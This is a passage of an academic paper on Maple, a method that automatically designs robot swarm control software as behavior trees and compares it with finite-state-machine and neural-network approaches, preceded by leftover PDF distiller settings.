/DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_5o44bzxzyzdwdmbx5hz3b4svtq ---- Automatic modular design of robot swarms using behavior trees as a control architecture Automatic modular design of robot swarms using behavior trees as a control architecture Antoine Ligot1,*, Jonas Kuckling1,*, Darko Bozhinoski1,2 and Mauro Birattari1 1 IRIDIA, Université Libre de Bruxelles, Brussels, Belgium 2 Cognitive Robotics, Delft University of Technology, Delft, Netherlands * These authors contributed equally to this work. ABSTRACT We investigate the possibilities, challenges, and limitations that arise from the use of behavior trees in the context of the automatic modular design of collective behaviors in swarm robotics. To do so, we introduce Maple, an automatic design method that combines predefined modules—low-level behaviors and conditions— into a behavior tree that encodes the individual behavior of each robot of the swarm. We present three empirical studies based on two missions: AGGREGATION and FORAGING. To explore the strengths and weaknesses of adopting behavior trees as a control architecture, we compare Maple with Chocolate, a previously proposed automatic design method that uses probabilistic finite state machines instead. In the first study, we assess Maple’s ability to produce control software that crosses the reality gap satisfactorily. In the second study, we investigate Maple’s performance as a function of the design budget, that is, the maximum number of simulation runs that the design process is allowed to perform. In the third study, we explore a number of possible variants of Maple that differ in the constraints imposed on the structure of the behavior trees generated. The results of the three studies indicate that, in the context of swarm robotics, behavior trees might be appealing but in many settings do not produce better solutions than finite state machines. Subjects Adaptive and Self-Organizing Systems, Agents and Multi-Agent Systems, Artificial Intelligence, Computer Aided Design, Robotics Keywords Swarm robotics, Automatic design, Behavior trees, Finite state machines, Evolutionary robotics, AutoMoDe, Optimisation-based design INTRODUCTION In this article, we extend the original definition of AutoMoDe—the family of automatic modular design methods proposed by Francesca et al. (2014)—to study the use of behavior trees as a control software architecture for robot swarms. In swarm robotics, a large group of autonomous robots cooperate to perform a mission that is beyond the limited capabilities of a single robot (Beni, 2004; Şahin, 2004; Brambilla et al., 2013; Garattoni & Birattari, 2016). A robot swarm is highly redundant, self-organized, and decentralized in nature. These properties are appealing in applications that, for example, imply a high risk of individual failure, take place in locations with limited communication infrastructure, or require scalability (Dorigo, Birattari & Brambilla, 2014). How to cite this article Ligot A, Kuckling J, Bozhinoski D, Birattari M. 2020. Automatic modular design of robot swarms using behavior trees as a control architecture. PeerJ Comput. Sci. 6:e314 DOI 10.7717/peerj-cs.314 Submitted 25 June 2020 Accepted 16 October 2020 Published 9 November 2020 Corresponding authors Antoine Ligot, aligot@ulb.ac.be Mauro Birattari, mbiro@ulb.ac.be Academic editor Robertas Damaševičius Additional Information and Declarations can be found on page 23 DOI 10.7717/peerj-cs.314 Copyright 2020 Ligot et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.314 mailto:aligot@�ulb.�ac.�be mailto:mbiro@�ulb.�ac.�be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.314 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Unfortunately, these properties have also a downside: it is difficult to conceive and implement control software for the individual robots so that a desired collective behavior is produced. As a general methodology is still missing, the design process is typically labor intensive, time consuming, error prone, and difficult to reproduce (Brambilla et al., 2013; Francesca & Birattari, 2016; Bozhinoski & Birattari, 2018). Automatic design is a valid and promising alternative (Francesca & Birattari, 2016; Birattari et al., 2019). In automatic design, the problem of designing control software to perform a given mission is re-formulated into an optimization problem: an optimization algorithm searches a space of candidate solutions so as to maximize an objective function. In this context, a candidate solution is an instance of the control software to be executed by each robot; and the objective function is a mission-dependent score that measures the performance of the swarm on the given mission. Because the evaluation of candidate solutions on physical robots is costly and time consuming, automatic design methods typically rely on simulation.1 A major issue with the adoption of simulation in automatic design is the so called reality gap (Brooks, 1992; Jakobi, Husbands & Harvey, 1995): the difference between simulation and reality, which is ultimately unavoidable. As a result of the reality gap, it is possible, and even likely, that control software generated in simulation suffers from a drop in performance when deployed in reality. The reality gap is one of the most challenging issues in the automatic design of robot swarms (Francesca & Birattari, 2016). Evolutionary swarm robotics (Trianni, 2008, 2014)—the application of evolutionary robotics (Lipson, 2005; Floreano, Husbands & Nolfi, 2008) to robot swarms—is a popular automatic design approach. In evolutionary swarm robotics, an evolutionary algorithm (Bäck, Fogel & Michalewicz, 1997) generates the control software of the robots, typically in the form of an artificial neural network. The input of the artificial neural network are the sensor readings; the output are the control actions that drive the actuators. Although evolutionary swarm robotics has been successfully used to generate control software for various missions (Quinn et al., 2003; Christensen & Dorigo, 2006; Hauert, Zufferey & Floreano, 2009; Trianni & Nolfi, 2009), it presents some known limitations, among which is its inability to cross the reality gap reliably (Silva et al., 2016). Francesca et al. (2014) conjectured that the issues encountered by evolutionary robotics with the reality gap are due to the high representational power of artificial neural networks. This leads the design process to overfit characteristics of the simulator that do not have a counterpart in reality. As a result, the control software produced fails to generalize to the real world. Inspired by the notion of bias–variance tradeoff (Geman, Bienenstock & Doursat, 1992) from the supervised learning literature, Francesca et al. (2014) developed AutoMoDe: an automatic design approach in which control software is conceived by automatically assembling predefined modules (that is, low-level behaviors and conditions) into a modular software architecture. The rationale behind AutoMoDe is to lower the representational power—and therefore the variance—of the control software it produces by introducing bias: it is restricted to be combinations of predefined modules. This restriction restrains the space of the possible instances of control software that can be 1 For the sake of completeness, we men- tion here that some automatic design methods do not rely on simulation. They operate while robots are deployed in their operating environment. We refer the reader to Francesca & Birattari (2016) for a discussion of advantages and limitations of these methods. Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 2/27 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ generated by AutoMoDe, with the intent of reducing the risk to overfit characteristics of the simulator that are not a faithful representation of reality. AutoMoDe is an abstract approach that, in order to be used, must be specialized to a specific robotic platform by defining low-level behaviors and conditions, the specific rules/constraints to combine them, and the optimization algorithm to search the space of solutions. So far, all instances of AutoMoDe—that is, Vanilla (Francesca et al., 2014), Chocolate (Francesca et al., 2015), Gianduja (Hasselmann, Robert & Birattari, 2018), Waffle (Salman, Ligot & Birattari, 2019), Coconut (Spaey et al., 2019), Icepop (Kuckling, Ubeda Arriaza & Birattari, 2019), and TuttiFrutti (Garzón Ramos & Birattari, 2020)— that have been proposed target the e-puck robot (Mondada et al., 2009). To substantiate their conjecture, Francesca et al. (2014) compared the performance of Vanilla and Chocolate with EvoStick, an implementation of the classical evolutionary swarm robotics approach. In their experiments, Francesca et al. (2014, 2015) observed that both Vanilla and Chocolate are able to generate control software that crosses the reality gap satisfactorily. In addition, they observed what can be called a rank inversion (Ligot & Birattari, 2018, 2019): EvoStick outperforms Vanilla and Chocolate in simulation, but Vanilla and Chocolate outperform EvoStick in reality. In the original definition, Francesca et al. (2014) have characterized AutoMoDe as an approach to generate control software in the form of a probabilistic finite-state machine (Francesca et al., 2014, 2015). However, this characterization appears to be too restrictive: the element that truly characterize AutoMoDe—whose name is the contraction of automatic modular design—is that it generates control software by combining and fine-tuning predefined modules. Indeed, according to the conjecture of Francesca et al. (2014), its modular nature is the main reason why AutoMoDe has shown to be robust to the reality gap: the architecture into which the modules are assembled appears to be a secondary issue. In this article, we aim at investigating the possibilities, challenges, and limitations that arise from the use of behavior trees in the context of the automatic modular design of collective behaviors in swarm robotics. Behavior trees are a popular control architecture originally proposed for game development (Champandard, 2007; Champandard, Dawe & Hernandez-Cerpa, 2010), and offer a number of advantages over finite-state machines, such as enhanced expressiveness, inherent modularity, and two-way control transfers (Colledanchise & Ögren, 2018). Moreover, Colledanchise & Ögren (2018) have shown that behavior trees generalize a number of other architectures including the subsumption architecture (Brooks, 1986) and decision trees (Nehaniv & Dautenhahn, 2002). Recently, behavior trees have attracted interest from the domains of artificial intelligence and robotics (Colledanchise & Ögren, 2018). The main characteristics of behavior trees is the use of complex behavioral modules as leaf nodes that return their state of execution: running, success, or failure. Behavior trees are therefore a convenient way to implicitly model plans of execution: they define what action needs to be taken if a given condition is met or not, and if a given behavior succeeds or fails. The current practice of swarm robotics goes against the principle of planning as the individual robots used are typically simple and reactive in the sense defined by Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 3/27 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ Brooks (1991). In the reactive paradigm, a low-level behavior is executed indefinitely until an external event triggers the indefinite execution of another low-level behaviors, and so on. Due to this cultural legacy, the low-level behaviors typically operated by robots within swarms do not have natural termination criteria, and therefore do not have success/failure states. In addition, the hardware limitations of the simple individual robots typically used in swarm robotics does not give them the capabilities of assessing natural termination criteria of the low-level behaviors they are executing. It is nonetheless possible to use behavior trees as a control software architecture for robot swarms, as it has already been done by Jones et al. (2018). However, to do so, design choices are needed and possibly only a subset of the functionalities of the behavior trees can be used, which forces one to renounce the implicit planning that they offer. For example, Jones et al. (2018) considered atomic commands as action nodes (i.e., move forward, turn left/right, or store data) that always return success after the second execution of the behavior, and never return failure. Despite not benefiting from the full potential of behaviors trees when combining low-level behaviors without natural termination criteria, it remains that the inherent modularity that they offer makes behavior trees a control architecture that is well worth exploring in the context of automatic design of robot swarm. Indeed, because each subtree is a valid structure, behavior trees are more easily manipulated than finite-state machines (Colledanchise & Ögren, 2018). Therefore, one could conceive tailored optimization algorithms based on local manipulations that explore the possible collective behaviors obtained by selecting, combining, and fine-tuning predefined modules into behavior trees more efficiently than into finite state machines. In this work, we study the use of behavior trees in fully automatic off-line design of robot swarms (Birattari, Ligot & Hasselmann, 2020). We do so by developing a method that uses low-level behaviors that are more complex than those of Jones et al. (2018), but yet less complex than those typically used in applications of behaviors tree to other domains. Indeed, rather than using atomic commands and assuming the artificial return of success after a given time, we use low-level behaviors as they are typically conceived in swarm robotics, that is, without the notion of success or failure. We devised Maple, a novel instance of AutoMoDe that has at its disposal the same low-level behaviors and conditions used by Vanilla and Chocolate, with the goal of understanding the conditions under which it is beneficial to adopt behavior trees over finite state machines in modular automatic design. Maple is in many aspects similar to Chocolate: in fact, we only substituted probabilistic finite state machines with behavior trees. This way, differences in performance between the two methods can only be attributed to the different control architecture they adopt. Because the behavioral modules adopted in Maple only return running, Maple produces control software in the form of behavior trees with predetermined structure that only use a subset of the behavior trees functionalities. In this structure, a conditional module is combined with a low-level behavior in order to act as a termination criterion for the said low-level behavior. We present three empirical studies conducted on two missions. In the first one, we study the robustness of automatically generated control software in the form of behavior trees by comparing its performance in simulation and in reality. The results show that the control software generated by Maple Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 4/27 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ performs similarly to the one generated by Chocolate, and that it crosses the reality gap more satisfactorily than the one generated by EvoStick. This confirms Francesca et al.’s (2014) conjecture that AutoMoDe is robust to the reality gap due to its modular nature. In the second study, we investigate the impact of different design budgets on the performance of the control software produced by Maple and Chocolate. The results indicate that Maple converges to satisfactory solutions faster than Chocolate. However, it appears that the expressiveness of the control structure adopted in Maple is reduced with regard to the one of finite state machines: Maple cannot produce solutions as complex as those produced by Chocolate for one of the missions considered. In the third study, we explore multiple alternatives to the structure of the behavior trees adopted in Maple. All these alternatives are predefined, restricted behavior trees structures that can be used with low-level behaviors that do not have a natural termination criterion. The results show that none of the explored structures outperform the one adopted in Maple in both missions considered. This paper extends on preliminary results presented in a conference (Kuckling et al., 2018a). We present here the complete description of the automatic design method and justifications of the design choices, together with more experimental results. The work of Jones et al. (2018) brought initial evidence that behavior trees are a viable control architecture to be adopted in swarm robotics when considering atomic commands as action nodes. Our studies highlight the strengths and weaknesses of behavior trees when applied low-level behaviors as they are typically conceived in this domain: our results suggest that, although behavior trees might be appealing under some settings, under other they do not produce better results than finite state machines and might be even outperformed by the latter. What hinders the application of behavior trees to swarm robotics is the absence of the notion of success and failure in the low-level behaviors typically adopted in swarm robotics. We believe that, in order to develop low-level behaviors that are appropriate for behavior trees, one should overcome technical issues (that is, use robots whose hardware capabilities enable them to infer natural termination criteria) and a cultural legacy. Behavior trees In this section, we give a brief description of behavior trees and their functioning. We adopt the framework that Marzinotto et al. (2014) proposed to unify the different variants of behavior trees described in the literature. We refer the reader to the original description of the framework for more details. The original idea of behavior trees was proposed for the Halo 2 video game (Isla, 2005). Since then, behavior trees have found applications in many computer games, for example, Spore and Bioshock (Champandard, Dawe & Hernandez-Cerpa, 2010). Recently, behavior trees have attracted the interest of the research community. Initial research focused on the automatic generation of behaviors in video games, for example, the commercial game DEFCON (Lim, Baumgarten & Colton, 2010) and the Mario AI competition (Perez et al., 2011). Even more recently, behavior trees have found applications in the control of unmanned aerial vehicles (Ögren, 2012), surgical robots (Hu et al., 2015), and collaborative robots (Paxton et al., 2017). Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 5/27 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ A behavior tree is a control architecture that can be expressed as a directed acyclic graph with a single root. With a fixed frequency, the root generates a tick that controls the execution. The tick is propagated through the tree and activates each node that it visits. The path that the tick takes through the tree is determined by the inner nodes, which are called control-flow nodes. Once the tick reaches a leaf node, a condition is evaluated or an action is performed. Then, the leaf node immediately returns the tick to its parent together with one of the following three values: success, failure, or running. A condition node returns success, if its associated condition is fulfilled; failure, otherwise. An action node performs a single control step of its associated action and returns success, if the action is completed; failure, if the action failed; running, if the action is still in progress. When a control-flow node receives a return value from a child, it either immediately returns this value to its parent, or it continues propagating the tick to the remaining children. There are six types of control-flow nodes: Sequence (!): ticks its children sequentially, starting from the leftmost child, as long as they return success. Because it does not remember the last child that returned running, it is said to be memory-less. Once a child returns running or failure, the sequence node immediately passes the returned value, together with the tick, to its parent. If all children return success, the node also returns success. Selector (?): memory-less node that ticks its children sequentially, starting from the leftmost child, as long as they return failure. Once a child returns running or success, the selector node immediately passes the returned value, together with the tick, to its parent. If all children return failure, the node also returns failure. Sequence� (!�): version of the sequence node with memory: resumes ticking from the last child that returned running, if any. Selector� (?�): version of the selector node with memory: resumes ticking from the last child that returned running, if any. Parallel (!!): ticks all its children simultaneously. It returns success if a defined fraction of its children return success; failure if the fraction of children return failure; running otherwise. Decorator (δ): is limited to a single child. It can alter the number of ticks passed to the child and the return value according to a custom function defined at design time. In the context of automatic modular design, the most important properties of behavior trees are their enhanced expressiveness, the principle of two-way control transfers, and their inherent modularity (Ögren, 2012; Colledanchise & Ögren, 2018). Ögren and coworkers have shown that behavior trees generalize finite-state machines only with selector and sequence nodes (Ögren, 2012; Marzinotto et al., 2014). With parallel nodes, behavior trees are able to express individual behaviors that have no representation in classical finite-state machines. The principle of two-way control transfers implies that the control can be passed from a node to its child, and can also be returned from the child, along with information about the state of the system. Finally, behavior trees are inherently modular: each subtree is a valid behavior tree. Due to this property, behavior trees can be easily manipulated as one can move, modify, or prune subtrees without compromising the structural integrity of the behavior tree. The modularity of behavior trees could simplify the conception of tailored optimization algorithm based on local manipulations. Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 6/27 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ AUTOMODE—MAPLE Maple is an automatic modular design method that generates control software in the form of behavior trees. It does so by selecting, combining, and fine-tuning a set of predefined modules: the six low-level behaviors and the six conditions defined by Francesca et al. (2014) for Vanilla, and later used in Chocolate (Francesca et al., 2015). We introduce Maple with the purpose of exploring the use of behavior trees as a control architecture in the automatic modular design of robot swarms. To conduct a meaningful study on the potentials of behavior trees as a control architecture, we compare Maple with Chocolate, a state-of-the-art automatic modular design method that generates control software in the form of probabilistic finite-state machines (Francesca et al., 2015; Francesca & Birattari, 2016). We conceived Maple to be as similar as possible to Chocolate so that differences in performance between the two methods can only be attributed to the different control architecture they adopt. Maple and Chocolate generate control software for the same robotic platform, they have at their disposal the same set of modules, and they use the same optimization algorithm. In a probabilistic finite-state machine generated by Chocolate, a state is an instantiation of a low-level behavior and a transition is an instantiation of a condition. Because low-level behaviors (the states of the finite-state machine) are executed until an external condition (a transition) is enabled, they do not have inherent termination criteria. The absence of natural termination criteria implies that, when used as action nodes in a behavior tree generated by Maple, the low-level behaviors of Chocolate can only return running. As a result, part of the control-flow nodes of behavior trees do not work as intended. With Maple, we chose to use the unmodified modules of Chocolate, and force the generated behavior trees to adopt a restricted structure that only uses a subset of the control-flow nodes. Robotic platform Maple produces control software for the e-puck robot (Mondada et al., 2009) equipped with several extension boards (Garattoni et al., 2015), including the range-and-bearing board (Gutiérrez et al., 2009). The predefined modules on which Maple operates have access to a subset of the capabilities of the e-puck robot that are formally defined by the reference model RM 1.1 (Hasselmann et al., 2018)—see Table 1. Table 1 Reference model RM1.1 (Hasselmann et al., 2018). Sensors and actuators of the e-puck robot. Period of control cycle: 100 ms. Sensor/Actuator Variables Values Proximity proxi, with i ϵ {0,…,7} [0,1] Light lighti, with i ϵ {0,…,7} [0,1] Ground groundi, with i ϵ {0,…,2} {black, gray, white} Range-and-bearing n {0,…,19} Vd ([0,0.7]m, [0,2π] radian) Wheels vl, vr [−0.12, 0.12]ms −1 Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 7/27 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ The modules can adjust the velocity of the two wheels (vl and vr) of the robot, detect the presence of obstacles (proxi), measure the intensity of the ambient light (lighti), and identify whether the ground situated directly beneath the robot is black, gray, or white (groundi). The modules have also access to the number n of surrounding peers within a range of up to 0.7 m, as well as to a vector Vd ¼ Pn m¼1 1=rm; ffbmð Þ where rm and are distance and bearing of the m-th neighboring peer (Spears et al., 2004). Set of modules Maple has at its disposal the same set of modules used by Vanilla (Francesca et al., 2014) and Chocolate (Francesca et al., 2015). Some of the modules are parametric so that the optimization algorithm can fine-tune their behavior on a per-mission basis. The set comprises six low-level behaviors and six conditions. A low-level behavior is a way in which the robot operates its actuators in response to the readings of its sensors. A condition is a context that the robot perceives via its sensors. Conditions contribute to determine which behavior is executed at any moment in time. In the behavior trees generated by Maple, an action node is selected among the six low-level behaviors and a condition node is selected among the six conditions. In the following, we briefly describe the low-level behaviors and conditions. For the details, we refer the reader to their original description given by Francesca et al. (2014). Low-level behaviors Exploration: if the front of the robot is clear of obstacles, the robot moves straight. When an obstacle is perceived via the front proximity sensors, the robot turns in-place for a random number of control cycles drawn in 0; …; sf g. τ is an integer parameter 2 0; …; 100f g. Stop: the robot does not move. Phototaxis: the robot moves towards the light source. If no light source is perceived, the robot moves straight while avoiding obstacles. Anti-phototaxis: the robot moves away from the light source. If no light source is perceived, the robot moves straight while avoiding obstacles. Attraction: the robot moves towards its neighboring peers, following αVd, where the parameter a 2 1; 5½ � controls the speed of convergence towards them. If no peer is perceived, the robot moves straight while avoiding obstacles. Repulsion: the robot moves away from its neighboring peers, following −αVd, where the parameter a 2 1; 5½ � controls the speed of divergence. If no peer is perceived, the robot moves straight while avoiding obstacles. Conditions Black-floor: true with probability β, if the ground situated below the robot is perceived as black. Gray-floor: true with probability β, if the ground situated below the robot is perceived as gray. White-floor: true with probability β, if the ground situated below the robot is perceived as white. Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 8/27 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ Neighbor-count: true with probability z nð Þ ¼ 1 þ egðn�nÞ � ��1 , where n is number of detected peers. The parameters g 2 0; 20½ � and n 2 0; …; 10f g control the steepness and the inflection point of the function, respectively. Inverted-neighbor-count: true with probability 1 � z nð Þ. Fixed-probability: true with probability β. Control software architecture The low-level behaviors of Chocolate have no inherent success or failure criterion and can only return running when used as action nodes in behavior trees. To use Chocolate’s low-level behaviors as action nodes, we constrained Maple to generate behavior trees that have a particular, restricted structure. This restricted structure only uses a subset of the control-flow nodes of the classical implementation of behavior trees. The top-level node is a sequence� node (!�) and can have up to four selector subtrees attached to it. A selector subtree is composed of a selector node (?) with two leaf nodes: a condition node as the left leaf node, and an action node as the right leaf node. Figure 1 illustrates a behavior tree with the restricted structure adopted here. We limit the maximal number of subtrees, and therefore the number of action nodes, to four so as to mimic the restrictions of Chocolate, which generates probabilistic finite-state machines with up to four states. In the example of Fig. 1, the left-most selector subtree (highlighted by the dashed box) is first ticked and action A1 is executed as long as condition C1 returns failure. If condition C1 returns success, the top-level node (!�) ticks the second selector subtree, and A2 is executed, provided that C2 returns failure. Because the top-level node is a control-flow node with memory, the tick will resume at the second subtree in the following control cycle. A2 is therefore executed as long as C2 returns failure. Although actions A1 and A4 are not in adjacent sub-trees, A4 can be executed directly after A1 granted that conditions C1, C2, and C3 return success and C4 returns failure. When condition C4 of the last selector subtree returns success, the top-level node of the tree also returns success and no →∗ ? C1 A1 ? C2 A2 ? C3 A3 ? C4 A4 Figure 1 Illustration of a behavior tree with restricted structure that Maple can produce. Maple generates a behavior tree by defining first the number of selector subtrees (highlighted by the dashed box), and by then specifying and fine-tuning the condition and action nodes that compose each selector subtree. Full-size DOI: 10.7717/peerj-cs.314/fig-1 Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 9/27 http://dx.doi.org/10.7717/peerj-cs.314/fig-1 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ action is performed. In this case, the tree is ticked again at the next control cycle, and the top-level node ticks the left-most selector subtree again. The size of the space spanning all possible instance of control software that can be produced by Maple is in O jBj4jCj4Þ � , where B and C are the sets of low-level behaviors and conditions, respectively (Kuckling et al., 2018b). The search space can be formally defined as: T; #Nð2Þ; Nð2Þi ; #Li; Lij; L p ij h i ; with i ¼ 1; …; #Nð2Þ n o ; j ¼ 1; …; #Lif g; where T 2 sequence�f g is the type of the top-level node; #Nð2Þ 2 1; …; 4f g is the number of level 2 nodes; N ð2Þ i 2 selectorf g is the type of the level 2 node i; #Li 2 2f g is the number of leafs of node i; Lij is the type of the j-th leaf of node i, with Li1 2 C and Li2 2 B; and Lpij are the parameters of leaf Lij. Optimization algorithm Maple uses Iterated F-race (Balaprakash, Birattari & Stützle, 2007; López-Ibáñez et al., 2016) as an optimization algorithm. Iterated F-race searches the space of all possible candidate solutions for the best one according to a mission-specific measure of performance. The Iterated F-race algorithm comprises multiple steps, each of which is reminiscent of a race. In the first race, a uniformly distributed set of candidate solutions is sampled. These candidates are initially evaluated on a set of different instances. Typically, an instance describes the configuration of the arena at the beginning of an experiment (that is, positions and orientations of the robots, positions of eventual obstacles or objects of interest, or color of the floor). After the initial set of evaluations is performed, a Friedman test (Friedman, 1937, 1939; Conover, 1999) is performed on the performance obtained by the candidate solutions. The candidate solutions that perform significantly worse than at least another one are discarded. The algorithm keeps evaluating the remaining candidate solutions on new instances and discards those that are statistically dominated. The race terminates when only one surviving candidate solution remains, or when the maximal number of evaluation defined for the race is reached. In the following races, the new set of candidate solutions is sampled with a distribution that gives higher priority to solutions that are similar to the surviving solutions of the previous one. EXPERIMENTAL SETUP In this section, we describe the experimental setup that is common to the three studies conducted. In particular, we describe the previously proposed automatic design methods against which we compare Maple, the missions for which we generate control software, and the protocol we follow. Further details are given in each of the sections dedicated to the specific studies. Automatic design methods In Study 1 and 2, we compare Maple with two previously proposed methods: Chocolate and EvoStick. Maple is described in the previous section. Here, we briefly describe Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 10/27 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ Chocolate and EvoStick: we refer the reader to Francesca et al. (2014, 2015) for the details. Chocolate (Francesca et al., 2015) is an automatic modular method that selects, combines, and fine-tunes the same twelve predefined modules as Maple. In Chocolate, the architecture of the control software is a probabilistic finite-state machine. In this context, a state is an instance of low-level behavior and an edge is an instance of condition. Similarly to Maple, Chocolate adopts Iterated F-race as an optimization algorithm. With Chocolate, the search space of Iterated F-race is restricted to probabilistic finite-state machines that comprise up to four states, and up to four outgoing edges per state. The size of the search space defined by the control architecture of Chocolate is in OðjBj4jCj16Þ, where B and C are the sets of low-level behaviors and of conditions, respectively (Kuckling et al., 2018b). EvoStick (Francesca et al., 2014, 2015) is a straightforward implementation of the evolutionary swarm robotics approach. In EvoStick, the architecture of the control software is a fully-connected, single layer, feedforward neural network. The neural network comprises 24 input nodes for the readings of the sensors described in the reference model RM 1.1: 8 for the proximity sensors, 8 for the light sensors, 3 for ground sensors, and 5 for the range-and-bearing board. Out of the five input nodes dedicated to the range-and- bearing board, one is allocated to the number of detected peers and the four others are allocated to the scalar projection of the vector Vd on four unit vectors. The neural network comprises 2 output nodes controlling the velocities of the wheels. The topology of the neural network is fixed, and an evolutionary algorithm fine-tunes the 50 weights of the connections between the input and the output nodes. Each weight is a real value in the range �5; 5½ �. In EvoStick, the population is composed of 100 individuals that are evaluated 10 times per generation. Missions We consider two missions: FORAGING and AGGREGATION. The two missions must be performed in a dodecagonal arena delimited by walls and covering an area of 4.91. The swarm is composed of 20 e-puck robots that are distributed uniformly in the arena at the beginning of each experimental run, and we limit the duration of the missions to 120. FORAGING Because the robots cannot physically carry objects, we consider an idealized form of foraging. In this version, we reckon that an item is picked up when a robot enters a source of food, and that a robot drops a carried item when it enters the nest. A robot can only carry one item at a time. In the arena, a source of food is represented by a black circle, 